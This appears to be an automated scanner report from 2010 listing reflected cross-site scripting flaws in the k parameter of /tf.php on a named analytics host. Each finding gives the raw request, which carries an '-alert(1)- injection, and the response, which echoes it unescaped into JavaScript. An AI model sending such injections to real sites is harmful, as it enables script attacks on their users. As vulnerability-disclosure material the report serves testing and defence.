1. Cross-site scripting (reflected)
1.1. https://rt.trafficfacts.com/tf.php [k parameter]
1.2. https://rt.trafficfacts.com/tf.php [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | https://rt.trafficfacts |
Path: | /tf.php |
GET /tf.php?k=282-963-6072814ef'-alert(1)- Host: rt.trafficfacts.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 31 Oct 2010 23:15:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.6 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Transfer-Encoding Connection: close Content-Type: application/javascript; charset=utf-8 Content-Length: 449 var tf_Src="rt.trafficfacts var sa_ra='c1.php'; var sa_ia='ec1.php'; var sa_hi='?k=282-963-6072814ef'-alert(1)- //<!-- Site Analytics (begin)--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://rt.trafficfacts |
Path: | /tf.php |
GET /tf.php?k=282-963-6072/a497f'-alert(1)- Host: rt.trafficfacts.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 31 Oct 2010 23:18:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.6 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Transfer-Encoding Connection: close Content-Type: application/javascript; charset=utf-8 Content-Length: 450 var tf_Src="rt.trafficfacts var sa_ra='c1.php'; var sa_ia='ec1.php'; var sa_hi='?k=282-963-6072/a497f'-alert(1)- //<!-- Site Analytics (begin)--> ...[SNIP]... |